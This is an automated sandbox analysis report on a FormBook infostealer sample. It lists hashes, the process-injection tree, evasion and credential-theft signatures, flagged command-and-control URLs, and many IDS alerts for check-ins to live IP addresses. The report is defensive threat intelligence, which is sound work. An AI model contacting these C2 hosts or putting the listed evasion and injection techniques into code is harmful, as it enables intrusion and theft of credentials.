Edit tour

Windows Analysis Report
MmF9tcIj1J.exe

Overview

General Information

Sample name:	MmF9tcIj1J.exe renamed because original name is a hash value
Original sample name:	304cb6ee1b7c472e7779be689bae38156a157b10eb20f490026e1465154afdaa.exe
Analysis ID:	1632372
MD5:	ce55ef89122ca819c20629f69e69eafb
SHA1:	afceee3b8dd73ffc68a7167434cbcf3a8302ef76
SHA256:	304cb6ee1b7c472e7779be689bae38156a157b10eb20f490026e1465154afdaa
Tags:	exeFormbookuser-adrian__luca
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

MmF9tcIj1J.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\MmF9tcIj1J.exe" MD5: CE55EF89122CA819C20629F69E69EAFB)

MmF9tcIj1J.exe (PID: 7672 cmdline: "C:\Users\user\Desktop\MmF9tcIj1J.exe" MD5: CE55EF89122CA819C20629F69E69EAFB)

lq9nGfkZ7JbZdUv7.exe (PID: 4872 cmdline: "C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\MWvga3ZXJ.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

mshta.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\mshta.exe" MD5: 06B02D5C097C7DB1F109749C45F3F505)

lq9nGfkZ7JbZdUv7.exe (PID: 1632 cmdline: "C:\Program Files (x86)\JLPBoEOYAtaoUASuKgNkEBVRzCNblPEwaoLEXuwIApuxzButuuTGOlQayWTq\RkwEVF8IXE.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 2532 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.3692877173.0000000003180000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.3695080703.0000000005210000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3690653132.0000000000A50000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.3692941025.00000000031D0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1508811235.00000000017E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.3692821369.0000000003970000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1506820467.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1509021015.0000000002D20000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: MmF9tcIj1J.exe PID: 7416	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.MmF9tcIj1J.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.MmF9tcIj1J.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:58:44.058328+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49688	104.21.48.1	80	TCP
2025-03-07T22:59:07.347671+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49693	13.248.169.48	80	TCP
2025-03-07T22:59:20.838142+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49697	162.0.225.218	80	TCP
2025-03-07T22:59:34.926786+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49701	13.228.81.39	80	TCP
2025-03-07T22:59:48.530455+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49705	13.248.169.48	80	TCP
2025-03-07T23:00:02.163304+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49709	13.248.169.48	80	TCP
2025-03-07T23:00:16.299855+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49713	47.83.1.90	80	TCP
2025-03-07T23:00:30.015466+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49717	104.21.87.37	80	TCP
2025-03-07T23:00:44.033557+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49721	154.204.240.200	80	TCP
2025-03-07T23:00:57.673983+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49725	178.128.48.21	80	TCP
2025-03-07T23:01:11.152273+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49729	217.160.0.90	80	TCP
2025-03-07T23:01:24.484485+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49733	104.21.32.1	80	TCP
2025-03-07T23:01:37.764957+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49737	13.248.169.48	80	TCP
2025-03-07T23:01:51.111463+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49741	84.32.84.32	80	TCP
2025-03-07T23:02:05.633150+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49745	47.83.1.90	80	TCP
2025-03-07T23:02:19.722855+0100	2855465	1	A Network Trojan was detected	192.168.2.6	49749	174.136.53.218	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T22:58:59.609912+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49690	13.248.169.48	80	TCP
2025-03-07T22:59:02.165172+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49691	13.248.169.48	80	TCP
2025-03-07T22:59:04.773307+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49692	13.248.169.48	80	TCP
2025-03-07T22:59:13.001374+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49694	162.0.225.218	80	TCP
2025-03-07T22:59:15.575928+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49695	162.0.225.218	80	TCP
2025-03-07T22:59:18.144070+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49696	162.0.225.218	80	TCP
2025-03-07T22:59:27.283344+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49698	13.228.81.39	80	TCP
2025-03-07T22:59:29.860808+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49699	13.228.81.39	80	TCP
2025-03-07T22:59:32.400611+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49700	13.228.81.39	80	TCP
2025-03-07T22:59:40.698989+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49702	13.248.169.48	80	TCP
2025-03-07T22:59:43.220849+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49703	13.248.169.48	80	TCP
2025-03-07T22:59:45.800435+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49704	13.248.169.48	80	TCP
2025-03-07T22:59:54.088367+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49706	13.248.169.48	80	TCP
2025-03-07T22:59:56.585402+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49707	13.248.169.48	80	TCP
2025-03-07T23:00:00.183233+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49708	13.248.169.48	80	TCP
2025-03-07T23:00:08.714558+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49710	47.83.1.90	80	TCP
2025-03-07T23:00:11.216384+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49711	47.83.1.90	80	TCP
2025-03-07T23:00:13.823427+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49712	47.83.1.90	80	TCP
2025-03-07T23:00:22.235938+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49714	104.21.87.37	80	TCP
2025-03-07T23:00:24.839795+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49715	104.21.87.37	80	TCP
2025-03-07T23:00:27.384289+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49716	104.21.87.37	80	TCP
2025-03-07T23:00:36.400697+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49718	154.204.240.200	80	TCP
2025-03-07T23:00:38.973306+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49719	154.204.240.200	80	TCP
2025-03-07T23:00:41.504768+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49720	154.204.240.200	80	TCP
2025-03-07T23:00:50.027594+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49722	178.128.48.21	80	TCP
2025-03-07T23:00:52.571312+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49723	178.128.48.21	80	TCP
2025-03-07T23:00:55.321830+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49724	178.128.48.21	80	TCP
2025-03-07T23:01:03.401948+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49726	217.160.0.90	80	TCP
2025-03-07T23:01:05.979674+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49727	217.160.0.90	80	TCP
2025-03-07T23:01:08.555967+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49728	217.160.0.90	80	TCP
2025-03-07T23:01:16.813632+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49730	104.21.32.1	80	TCP
2025-03-07T23:01:19.384829+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49731	104.21.32.1	80	TCP
2025-03-07T23:01:21.918663+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49732	104.21.32.1	80	TCP
2025-03-07T23:01:30.023780+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49734	13.248.169.48	80	TCP
2025-03-07T23:01:32.582092+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49735	13.248.169.48	80	TCP
2025-03-07T23:01:35.163774+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49736	13.248.169.48	80	TCP
2025-03-07T23:01:43.307105+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49738	84.32.84.32	80	TCP
2025-03-07T23:01:45.885267+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49739	84.32.84.32	80	TCP
2025-03-07T23:01:48.463965+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49740	84.32.84.32	80	TCP
2025-03-07T23:01:57.674047+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49742	47.83.1.90	80	TCP
2025-03-07T23:02:00.432194+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49743	47.83.1.90	80	TCP
2025-03-07T23:02:02.979168+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49744	47.83.1.90	80	TCP
2025-03-07T23:02:12.072351+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49746	174.136.53.218	80	TCP
2025-03-07T23:02:14.618521+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49747	174.136.53.218	80	TCP
2025-03-07T23:02:17.176322+0100	2855464	1	A Network Trojan was detected	192.168.2.6	49748	174.136.53.218	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: MmF9tcIj1J.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.sigaque.today/wdz1/?56e87=VDD8OJ4H&CjuXKjB=a6zPArAcs68qsFGtTabzjyCobuMFh5AYI73tX7gtoPhGMe+Sl7/r92yDmXcH3BaZwyNUFPurN2KphsWf6vvA6fvZUSnh3QpL9dKDFXQtxsl2/KHzlz9zut+LhsKtEL2uwL2KJOU=	Avira URL Cloud: Label: malware
Source: http://www.dangky88kfree.online/tg7i/?CjuXKjB=W2lXFIPTRr4gesb5cwI0krzgLd36/9TbdyzTPi7nE0Z5NBEW+2FqYkNVo2Q4JiMVFhBrIV5cFAVL+yjFEQTGcK1oj27Lp27mt6TrOGKKvTfWhv2gr//jTvVuirH6o25Z8PLwJAA=&56e87=VDD8OJ4H	Avira URL Cloud: Label: malware
Source: http://www.j8g5rjpc.top/0n2g/	Avira URL Cloud: Label: malware
Source: http://www.corellia.pro/b6lp/	Avira URL Cloud: Label: malware
Source: http://www.dangky88kfree.online/tg7i/	Avira URL Cloud: Label: malware
Source: http://www.j8g5rjpc.top/0n2g/?CjuXKjB=fvZ7+iIC/TOHFCeFeBmLTEXsD3edtPY9OBxgr9LtykBa/CvCN5KBqrWYP+FQ6Pf4ssQMikZiOSwwxUN4REJawbXZhtEcjvnJZjvhmlYUu221S6iTRVzTzmyIZ7TjgG/a+0slBoM=&56e87=VDD8OJ4H	Avira URL Cloud: Label: malware
Source: http://www.corellia.pro/b6lp/?56e87=VDD8OJ4H&CjuXKjB=arOSZ/aZjFOIvQRY69DNNyuUiv5jjem2um+eBhx+733JBm31j6JLJ59OPZhYdXyw/lnqiSNjCITdwDNb+lYg7rfogT0dpOyAKgcolLV+bUO+gWL3ZF8aP7y1kiXIU6MqOXeLcBc=	Avira URL Cloud: Label: malware
Source: http://www.bjogo.top/p72h/?CjuXKjB=JBoasVqKMP/Tm9QoX+fzNGnUmdUkCFWsb5GUbFkhjKP5vsoVxEayp9YB9sG2XQZlNTDSgP5Ox1enp0SBoNbp1launwo2DlaU759DgYflM8WUARfDZqc4yZ8IOO3CnY+8e5nydM4=&56e87=VDD8OJ4H	Avira URL Cloud: Label: malware
Source: http://www.bjogo.top/p72h/	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: MmF9tcIj1J.exe	ReversingLabs: Detection: 76%
Source: MmF9tcIj1J.exe	Virustotal: Detection: 70%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 4.2.MmF9tcIj1J.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.MmF9tcIj1J.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.3692877173.0000000003180000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3695080703.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3690653132.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3692941025.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1508811235.00000000017E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.3692821369.0000000003970000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1506820467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1509021015.0000000002D20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: MmF9tcIj1J.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: MmF9tcIj1J.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: NEOn.pdb source: MmF9tcIj1J.exe
Source:	Binary string: mshta.pdbGCTL source: MmF9tcIj1J.exe, 00000004.00000002.1507065834.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 00000008.00000002.3691897348.000000000086E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: MmF9tcIj1J.exe, 00000004.00000002.1507208063.0000000001440000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1507163146.000000000308A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.3693186832.00000000033F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1509681517.0000000003248000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.3693186832.000000000358E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: NEOn.pdbSHA256 source: MmF9tcIj1J.exe
Source:	Binary string: wntdll.pdb source: MmF9tcIj1J.exe, MmF9tcIj1J.exe, 00000004.00000002.1507208063.0000000001440000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, mshta.exe, 00000009.00000003.1507163146.000000000308A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.3693186832.00000000033F0000.00000040.00001000.00020000.00000000.sdmp, mshta.exe, 00000009.00000003.1509681517.0000000003248000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000009.00000002.3693186832.000000000358E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: mshta.pdb source: MmF9tcIj1J.exe, 00000004.00000002.1507065834.0000000000FE7000.00000004.00000020.00020000.00000000.sdmp, lq9nGfkZ7JbZdUv7.exe, 00000008.00000002.3691897348.000000000086E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lq9nGfkZ7JbZdUv7.exe, 00000008.00000000.1429101175.00000000002DF000.00000002.00000001.01000000.0000000A.sdmp, lq9nGfkZ7JbZdUv7.exe, 0000000A.00000002.3690719075.00000000002DF000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Windows\SysWOW64\mshta.exe

Code function: 9_2_00A6C620 FindFirstFileW,FindNextFileW,FindClose,

9_2_00A6C620

Source: C:\Windows\SysWOW64\mshta.exe	Code function: 4x nop then xor eax, eax		9_2_00A59F40
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 4x nop then mov ebx, 00000004h		9_2_037F04CE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49701 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49714 -> 104.21.87.37:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49691 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49698 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49717 -> 104.21.87.37:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49702 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49708 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49697 -> 162.0.225.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49720 -> 154.204.240.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49700 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 217.160.0.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49690 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 217.160.0.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49745 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49741 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49695 -> 162.0.225.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49688 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49706 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 217.160.0.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49719 -> 154.204.240.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49692 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49703 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49721 -> 154.204.240.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49744 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49730 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49715 -> 104.21.87.37:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49694 -> 162.0.225.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49696 -> 162.0.225.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49749 -> 174.136.53.218:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49705 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49704 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49709 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49725 -> 178.128.48.21:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49716 -> 104.21.87.37:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49693 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49712 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49722 -> 178.128.48.21:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49710 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49707 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49711 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49718 -> 154.204.240.200:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49699 -> 13.228.81.39:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49729 -> 217.160.0.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49748 -> 174.136.53.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49746 -> 174.136.53.218:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49733 -> 104.21.32.1:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49724 -> 178.128.48.21:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49723 -> 178.128.48.21:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49737 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49747 -> 174.136.53.218:80
